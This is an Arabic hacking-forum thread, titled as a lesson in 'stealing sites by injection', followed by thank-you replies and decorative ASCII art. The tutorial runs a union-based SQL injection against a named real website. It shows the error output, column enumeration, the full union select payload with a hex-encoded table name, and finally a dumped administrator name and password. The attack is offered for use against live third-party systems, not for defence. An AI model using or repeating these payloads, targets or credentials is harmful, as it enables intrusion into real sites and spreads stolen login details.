|
تعلم سرقة المواقع بالحقن السلام عليكم ورحمة الله وبركاته كما وعدتكم لقد احضرت لكم درس ان شاء الله يعجبكة Scorpion hack te@M راح اشرحلكم اليوم عن السكيول او ما بيسموه الحقن SQL Injection طبعا ما رح اتعمق كتير مشان المبتدئين ما يضيعو ... والمعروف عن السكيول انه سهل ولذيذ وممتع يعني الاختراق عن طريق السكيول مسلي وما بده خبرة كبيرة كتير اما بالنسبة للطرق والتخطي والى ما ذلك ساضع لكم بعض الطرق المستخدمة الان والباقي تكتشفوه بانفسكم لان ما في حدا بالدنيا خلق محترف ... اعتمد على نفسك بعد معرفة المبادئ وابتكر طرق من عندك ولا تكن كالببغاء تقلد خلونا نشوف في عنا موقع مصاب ورح نشرح بالترتيب الطرق المتبعة بالحقن مع شرح الاوامر.. http://custen.iapechina.com/selloffers.php?pg=189&cid=0 اول شيء بنعمله هو كشف اذا كان الموقع مصاب ام لا وذلك يتم بكل سهولة باضافة علامة ( ' ) بعد المتغيرر بيجي واحد بيسال شو هو المتغيير ... يا صاحبي المتغيير هو الرقم الذي يأتي بعد اشارة = يعني في مثالنا يكون المتغير 0 نروح ونحط اشارة ' بعد المتغيير ونشوف Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\websites\iapechinab2b_en\htdoc\selloffers.php on line 98 هذا موقع على سيرفر نظامه windows المهم هو مصاب مثل ما شفتو .. بيجي واحد يقول كيف عرفت انه مصاب ؟ بعد ان تضع علامة ' خلف المتغيير وتغييرت الصفحة معناها الموقع مصاب الان شرح لمحة صغيرة عن الحقن ... شو هو الحقن وكيف بيتم ؟ الحقن بكل بساطة وبدون تعقيد ارسال اوامر استعلام للداتا بيز ( قاعدة البيانات ) مثلا امر order+by+number هو امر لاستخراج الاعمدة المصابة ... بنجي وبنحلل الامر وبنشرح كل كلمة فيه امر الاستعلام من القاعدة هو = order لتحديد مكان العمود = by المتغيير بيكون على شكل رقم من 1 الى لا نهاية = number حلو الى الان كل شي مفهوم بنجي بنطبق الاوامر على الموقع ولكن قبل التطبيق رح فرجيكم شكل مصغر ومبسط للداتا بيز Admin,topic هم عبارة عن الاعمدة يعني القاعدة هذه فيها عامودين فقط ( طبعا هذا مجرد مثال صغير ) يعني بمثالنا هذا لو اجينا ووضعنا الامر order+by+3 رح يظهر عنا خطأ والسبب ان القاعدة فيها عامودين فقط خلونا ننتقل للموقع ونطبق ونشوف ... النت بلش يخفف دم هههههه طيب مثل ما شفنا صار الخطأ محصور بـسطرين ... قبلها كان الخطأ 4 سطور طيب نجي نزيد عدد الاعمدة لحتى نشوف كم عمود في بالموقع طبعا الامر union select معناه ارسال امر لاظهار العمود الممكن الكتابة عليه ممكن يجي واحد ويسال كيف يعني كتابة هل يعني اقدر اكتب ضمن قاعدة البيانات ؟ بقله نعم ولا بنفس الوقت !! نعم بتقدر تكتب لكن على شكل برينت يعني بس بتظهرها بصفحة الويب يلي انت فاتحها لكن ما بتتخزن بقاعدة البيانات خلونا نشوف مثال عليه 5.1.34-community الان معنا 8 اعمدة والعمود المصاب هو 2 حلو طيب كيف رح نستخرج معلومات الادمن ؟ تعالو نطبق الامر هذا خلف الاعمدة From+information_schema.tables+where+table_schema= database() اول شي بنشرح معنى هذه الاوامر طيب الكلمات التالية وكل وحدة معناها : From = معناها اختر الاوامر يلي بعدها من Information_schema.tables = معناها اختار معلومات جدول المخطط من .. Where = اين يكون المخطط Table_schema = طبعا هون المقصد من الامر هذا اختيار الامر السابق من مخطط الجدول ومثل ما شايفين في بعده اشارة = وبعدها database() يعني من قاعدة البيانات اكيد بيكون صار براسكم مليون سؤال صح :S طيب تعالو نشرحلكم ياها على القاعدة البسيطة يلي عنا حلو الان بعد ما طبقا الامر From+information_schema.tables+where+table_schema= database() طلع عنا العمود المصاب هو 2 ... خلونا نطالع محتوى العمود باستبدال رقم 2 بـ Group_concat(table_name) طبعا مثل ما شفتو بعد تطبيق الامر هذا مكان العمود المصاب ظهر لنا كل جداول العمود وهي b2b_admin,b2b_ads,b2b_affiliate_banner,b2b_banned_ words,b2b_blocked,b2b_blocked_countries,b2b_busine sstypes,b2b_categories,b2b_companyprofiles,b2b_con fig,b2b_contacts,b2b_country,b2b_currencies,b2b_da teformats,b2b_employees,b2b_fav_cats,b2b_favorites ,b2b_feedback,b2b_groups,b2b_icons,b2b_levels,b2b_ mails,b2b_markets,b2b_members,b2b_message نحنا بيهممنا صف واحد بس وهو الادمن ... تعالو ندور عليه ... b2b_admin هذا هو وفي مثالنا بالقاعدة بيكون تمام الى الان بنروح نشفر كلمة جدول الادمن b2b_admin بمقياس hex وعمو كوكل بالخدمة ... تعالو نشوف بعد تشفير الكلمة بتظهر معنا بالشكل التالي 6232625f61646d696e بنروح ونستبدل كلمة database() بهذا التشفير طبعا ما ننسى نضع قبلها 0x ونستبدل كلمة schema بـ name ونستبدل كلمة tables بـ columns وكمان نستبدل كلمة table كمان بـ column sb_id,sb_admin_name,sb_pwd طبعا ظهر لنا محتوى الجدول بنروح على القاعدة يلي رسمتها ونستبدل مشان توصل الفكرة افضل بيجي واحد وبيقول يا رجل انت صعبتها وطولتها كتير !! طيب الغاية من كل هالعملية هذه انك تفهم معنى الحقن مو بس تطبق مثل الببغاء يعني الامر هذا union select 1,Group_concat(column_name),3,4,5,6,7,8+From+infor mation_schema.columns+where+table_name=0x6232625f6 1646d696e— معنى هذا الامر ارسال استعلام بعدد الاعمدة الموجودة بالقاعدة ويبلغ 8 اعمدة الى العمود المصاب ورقمه 2 ويسمح لنا بقرائة محتوى القاعدة وطلب اظهار بيانات الجدول المسمى sb_admin واظهار صفوفه المكونة من sb_id sb_admin_name sb_pwd اتمنى تكون وصتل الفكرة منيح ... الان نروح ونستبدل الاوامر بالشكل التالي نستبدل information_schema.columns+where+table_name=0x6232 625f61646d696e-- بـ b2b_admin ونستبدل column_name بـ معلومات الصفوف وهي sb_admin_name,sb_pwd طبعا ما ننسى نفصل بين sb_admin_name و sb_pwd بهذه العلامة ,0x3a, فصل النت : ( ثانية بس لازبط النت معلي انا اسف النت عندي وايرلس وفصل النت .. المهم بنرجع بنكمل الامر admin:tang@8com هي الادمن والباسورد مبروك عليكم : ) Scorpion hack te@M Sid_ali21@hotmail.fr Sidou <3 Hossam_1997@live.fr 3aMiD El HaCkeR أي سؤال نحن في الخدمة |
شكرا مجهوداتك جاري التجربة |
بارك الله فيك |
مشكور والله يجزاك خير شرح موفق وما منك قصور |
شكرا لك أخي على الشرح يوجد قسم خاص بالحقن |
¯`'•.¸(¯`'•.¸, _________________ , .•'´¯) .•'´¯) (¯`'•.¸(¯`'•.¸««««««««««««»»»»»»»»»»»¸.•'´¯).•'´¯) --==>>>--->تسلـــــــ,ــــــــــــم ا يـــــــــــدك<---<<<==-- (_¸.•'´(_¸.•'´««««««««««««»»»»»»»»»»»`'•¸_)'•.¸_) (_¸.•'´(_¸.•'´¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ `'•.¸_)`'•.¸_) تميز بلا حدود ©§¤°يسلموو°¤§©¤ـــــــــــــ¤©§¤°حلوو°¤§© ©§¤°يسلموو°¤§©¤ـــــــــــــــــــــ¤©§¤°حلوووو°¤§ © ©§¤°يسلموو°¤§©¤ـــــــــــــــــــــــــــــــــ¤© §¤°حلوووو°¤§© ©§¤°يسلموو°¤§©¤ـــــــــــــــــــــــــــــــــــ ــــــــ ¤©§¤°حلوووو°¤§© ©§¤°يسلموو°¤§©¤ـــــــــــــــــــــــــــــــــــ ـــــــــــــــــــــ¤©§¤°حلوووو°¤§© ©§¤°يسلموو°¤§©¤ـــــــــــــــــــــــــــــــــــ ـــــــــــــــــــــــــــــــــ¤©§¤°حلوووو°¤§© ©§¤°يسلموو°¤§©¤ـــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــ¤©§¤°حلو ووو°¤§© ©§¤°يسلموو°¤§©¤ـــــــــــــــــــــ رائع جدا جدا جداــــــــــــــــــــــ¤©§¤°حلو ووو°¤§© ©§¤°يسلموو°¤§©¤ـــــــــ يعطيك العافية والمزيد من الابداع ــــــــ¤©§¤°حلو ووو°¤§© مـ أرق تحياتي ـع kamal199 $$____$$$$$$$$$___$$$$$$$$$_ ___$$ $$___$$$$$$$$$$$_$$$$$$$$$$$ ___$$ $$___$$$$$$$$$$$$$$$$$$$$$$$ ___$$ $$____$$$$$$$$$$$$$$$$$$$$$_ ___$$ $$______$$$$$$$$$$$$$$$$$___ ___$$ $$________$$$$$$$$$$$$$_____ ___$$ $$__________$$$$$$$$$_______ ___$$ $$___________$$$$$$$________ ___$$ $$____________$$$$$_________ ___$$ $$_____________$$$__________ ___$$ $$______________$___________ ___$$ |
رد: تعلم سرقة المواقع بالحقن استغفر الله واتوب اليه سبحان الله وبحمده سبحان الله العظيم لاحولا ولاقوة الا بالله |
رد: تعلم سرقة المواقع بالحقن thhhhhhhhhxxxxxxxxxxxxxx |
| الساعة الآن 01:20 PM |
[ vBspiders.Com Network ]